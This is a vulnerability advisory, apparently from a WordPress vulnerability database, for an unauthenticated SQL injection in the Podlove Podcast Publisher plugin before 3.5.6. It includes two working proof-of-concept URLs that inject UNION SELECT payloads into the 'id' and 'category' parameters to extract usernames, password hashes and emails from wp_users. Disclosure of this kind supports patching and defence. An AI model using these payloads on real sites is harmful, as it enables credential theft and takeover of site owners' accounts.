WordPress Plugin Vulnerabilities
Podlove Podcast Publisher < 3.5.6 - Unauthenticated SQL Injection
Description
The plugin contains a 'Social & Donations' module (not activated by default), which adds the rest route '/services/contributor/(?P<id>[\d]+), takes an 'id' and 'category' parameters as arguments. Both parameters can be used for the SQLi.
Proof of Concept
With the 'Social & Donations' module of the plugin activated. Permalink Setting: Plain PoC with payload in id param: /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23 PoC with payload in category param: /index.php?rest_route=/podlove/v1/social/services/contributor/1&category=1')+UNION+SELECT+user_login,user_pass,user_email,null,null,null+FROM+wp_users%23
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-08-24 (about 2 years ago)
Added
2021-08-24 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)